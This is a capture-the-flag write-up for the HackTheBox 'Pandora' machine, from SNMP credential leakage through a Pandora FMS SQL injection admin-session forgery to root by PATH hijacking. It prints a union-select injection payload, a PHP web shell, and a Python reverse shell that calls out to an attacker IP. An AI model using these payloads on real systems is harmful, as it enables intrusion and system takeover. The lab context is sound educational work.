8.8 KiB
HackTheBox-Pandora
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
Visting the web page it seems like a template
data:image/s3,"s3://crabby-images/57218/57218d34b997e6364af468c7fedb85bf16083769" alt=""
And doesn't display anything interesting , running gobuster
to fuzz for files and directories
data:image/s3,"s3://crabby-images/facf6/facf6dc939a95ba82e8942c7f25fe7223207cdf7" alt=""
It doesn't find anything as well , so I thought of doing a subdomain enumeration using wfuzz
but that failed as well
data:image/s3,"s3://crabby-images/2a458/2a4589b608fc59d98f3547d7a35f2ffd669ff4de" alt=""
So the web application didn't had anything interesting so I starting to scan for udp port and found snmp
service to be running
data:image/s3,"s3://crabby-images/14bc0/14bc00132a2bc4c47b38a4a15b304c383ab9d2fa" alt=""
Foothold
To enumerate snmp service there's a tool called snmp-walk
so we can enumerate the running process ,interface and operating system through that
data:image/s3,"s3://crabby-images/aec21/aec210a23ff0a00fe23406bf79da6dff664b9c2b" alt=""
Keeping this tool running ,after 30 minutes I saw a process with credentials being passed on
data:image/s3,"s3://crabby-images/5614e/5614ed6410527d25f81c584ddfb9912c05a0fa88" alt=""
data:image/s3,"s3://crabby-images/67ba0/67ba06ce03ab055bf7d19a3a613d3c47b74fd439" alt=""
Checking the apache2 vhosts file we can see that there's a subdomain pandora.panda.htb
and it's being ran as user matt
but only on localhost so we need to do portforwarding in order to access it through our browser
data:image/s3,"s3://crabby-images/c384b/c384baa3bb0b3dcf9cb726010e987da84e30e360" alt=""
ssh -L 2222:127.0.0.1:80 daniel@panda.htb
data:image/s3,"s3://crabby-images/19c19/19c193bc04f97e350ec9e1d86f8b8a5b3d6f8571" alt=""
Also to add domain names to /etc/hosts file
data:image/s3,"s3://crabby-images/b2ab7/b2ab70c2f628fd4fb4da035330573fd8ec0f39e2" alt=""
Navigating to that port through browser will present us a login page for Pandora
data:image/s3,"s3://crabby-images/1e77e/1e77eb5c4e70860032520b0a9b97a1679826e578" alt=""
Going back to pandora's directory we can read some files out which there's a file named pandoradb_data.sql
which has some queries , we see a query for admin
user having his password hash
data:image/s3,"s3://crabby-images/5880f/5880f352c6ffada4584ef880af6b02887d321fa0" alt=""
So trying to login with daniel on pnadora we get an error that we are only allowed to use api
data:image/s3,"s3://crabby-images/55368/5536866615f471ad6cb1c154044b64744f07ef26" alt=""
Looking at the documention of api , we can use operations to get some data from pandora
https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi
http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=list_all_user&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23
data:image/s3,"s3://crabby-images/cd84b/cd84b3643c9b1ba4d53a83c9beed6baeca8f1fcf" alt=""
We can see that daniel is only allowed to read data from opearations , we can also get password hashes of users but those were not crackable
http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=users&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23
data:image/s3,"s3://crabby-images/3fdc0/3fdc0ccb813b227b44bc8296ba4d8b16d2c0f53e" alt=""
Looking for exploits I found remote code execution but that requires us to be authenticated and be an admin user
data:image/s3,"s3://crabby-images/da548/da548d5827789e7caaf7f2d1c8406031013ea26c" alt=""
The second exploit was related to sqli in/include/chart_generator.php?session_id='
data:image/s3,"s3://crabby-images/f745e/f745e470622659630e1df1d017474fe06572c231" alt=""
We can verify that there's a sqli by breaking the query with '
data:image/s3,"s3://crabby-images/4405a/4405ab7e6e4ffa93314869255514db0d746948e1" alt=""
Now to check how many columns are there we can use ORDER BY
data:image/s3,"s3://crabby-images/5f8ff/5f8ffc8e0b4f25f46df32f081b520d84ec64c95f" alt=""
It doesn't give any mysql errors so we are good ,let's increase a number
data:image/s3,"s3://crabby-images/ea1ea/ea1eac1454253f84a0f9bf7fb721887d8ab42edf" alt=""
data:image/s3,"s3://crabby-images/de624/de624dc71bae90e7569ad9f2d6cc5e335e21bfbf" alt=""
data:image/s3,"s3://crabby-images/4ac22/4ac22c482cf1ae8d8c7e1c2e22d0591ea458913c" alt=""
And it gives an error when try to sort table by the fourth column which doesn't exists and it gives an sql error so there are 3 columns in the table from which it's fetching the data
Rabbit Hole
so let's using sqlmap
to dump data , we can either just directly supply the url or save the request through burp , I find saving the request convenient for me so I'll go with that
data:image/s3,"s3://crabby-images/f789c/f789cd47834ae00d820caf0d8e9c338540c8789d" alt=""
And it's going to start dumping the database
data:image/s3,"s3://crabby-images/39e0b/39e0b7ce65d6594229e41ef708c277398fa08543" alt=""
Now here what we have fallen into a rabbit hole , by dumping the database we can find session id for users on pandora fms but those are only for matt and daniel , daniel only has access to api and matt is just a normal user
data:image/s3,"s3://crabby-images/63e79/63e7935543cc36801627f672b02826a99393d39b" alt=""
In PHPSESSSION
replace the session
data:image/s3,"s3://crabby-images/7849a/7849a1805ea35ad05487d06738f0b88cd67a6687" alt=""
data:image/s3,"s3://crabby-images/98b63/98b63b79280a4025eb9655afedb7b7f6bfc348d0" alt=""
But we can't really do much being matt user
data:image/s3,"s3://crabby-images/2669a/2669abeb383594973a4bcf20f27fa3dfba4631db" alt=""
Privilege Escalation (Matt)
So going back to the url which was vulnerable to sqli we can elevate our privilegs to become admin user by following this article
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
data:image/s3,"s3://crabby-images/aae59/aae59dae1e30ba9ffb7401eca4c47b985f419d23" alt=""
Checking the columns of the table that what values it expects , we can look in the pandoradb.sql
file that tsession_php
has three columns
data:image/s3,"s3://crabby-images/9bf3d/9bf3d7599d258d6bd3290d86dcd3657d89bfc64a" alt=""
Our sqli payload would look like this
union+select+'randomshit_token','1638796349','id_usuario|s:5:"admin";'+--+
it's using select statement to allow a phpsesssion to be created against the admin user with the token we provided ,it could be anything
data:image/s3,"s3://crabby-images/ea30b/ea30b9568930d60d2341dc4a4d29abf260e96a88" alt=""
Running this it doesn't show any errors which means it got executed correctly and now replacing the PHPSESSION with our token
data:image/s3,"s3://crabby-images/c6ac5/c6ac5063b3262772cdfbec0ce56bc876fa38082f" alt=""
We are now logged in as admin user now all that is left is to use the rce exploit, I tried the exploit from exploit-db but it didn't worked
Then saw a php file upload exploit from a youtube video
data:image/s3,"s3://crabby-images/92f25/92f259fdc4db49ea64495591e6da913ba770aaa1" alt=""
data:image/s3,"s3://crabby-images/e92d3/e92d3c6ea61335498916590f905a937090870f6d" alt=""
So we can make a php file which will allow us to execute comamnds and make a zip archive of that php as we need to upload that as an extension
<?php system($_GET['cmd']); ?>
data:image/s3,"s3://crabby-images/ad54d/ad54dcffa606a004f32e8fd49d63669f3345764c" alt=""
Then upload the archive file having the php file
data:image/s3,"s3://crabby-images/385af/385af52227d89abb8853a01a1e30adf5a6fd0523" alt=""
data:image/s3,"s3://crabby-images/53b81/53b8141659ec1dc9595de7fa866dca203bdf87c0" alt=""
After uploading the file , execute the file through http://127.0.0.1:2222/pandora_console/extensions/shell.php
data:image/s3,"s3://crabby-images/84271/84271c2e096ee95da8894f9a5a229fed3234d87a" alt=""
data:image/s3,"s3://crabby-images/9f768/9f768d96eefcad35aca671ebca157d0f89e6dc42" alt=""
We can get a reverse shell through python3
python3%20-c%20%27import%20socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.17%22,3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(%22/bin/sh%22)%27
data:image/s3,"s3://crabby-images/b9098/b909854c2338cce428c569024c6affd128812eb1" alt=""
Stabilizing the shell with python3
data:image/s3,"s3://crabby-images/544ab/544aba2bd898be34f8f1c444d7faa31702b9957d" alt=""
Privilege Escalation (root)
Let's try to see if we have any privileges to run something as a root user sudo -l
but it gives an error.
data:image/s3,"s3://crabby-images/62d9a/62d9ad85d8f486d54e413021b3ec4e62969679ec" alt=""
So this can be fixed by generating pair of ssh keys and logging.
data:image/s3,"s3://crabby-images/15a70/15a70c126862623b5f0313fbf253c93fd3b64c2a" alt=""
But it seems we can't run anything as a root user ,so moving on for fidining SUID binaries
This binary seems suspicious as this isn't available by default, transferring the pandora_backup
binary we can see that it's using tar
to create an archive from /var/www/pandora/pandora_console/*
in /root/.backup
and the archive name pandora-backup.tar.gz
data:image/s3,"s3://crabby-images/8f9a8/8f9a88a5a2123360137280e9e5aca9e5dbce99e2" alt=""
So this is vulnerable to PATH variable exploit , we can create a file named tar
which will make bash
a SUID binary and making it executable
data:image/s3,"s3://crabby-images/ec2b5/ec2b5fd4b5adba255ef7ef36559a2baa08c6b325" alt=""
Then exporting the PATH variable
export PATH=/tmp:$PATH
As we run the binary it will make bash a SUID
data:image/s3,"s3://crabby-images/88caa/88caa06ec52a245b4f5859f8ff2404ceb9e976f4" alt=""
data:image/s3,"s3://crabby-images/f1178/f1178308c1d63b6f7119333d6e399a5b972a0686" alt=""
References
- https://book.hacktricks.xyz/pentesting/pentesting-snmp
- https://vuldb.com/?id.174621
- https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi
- https://www.exploit-db.com/exploits/48280
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32099
- https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
- https://www.youtube.com/watch?v=rJXusinFPw4
- https://k4m1ll0.com/cve-2020-8500.html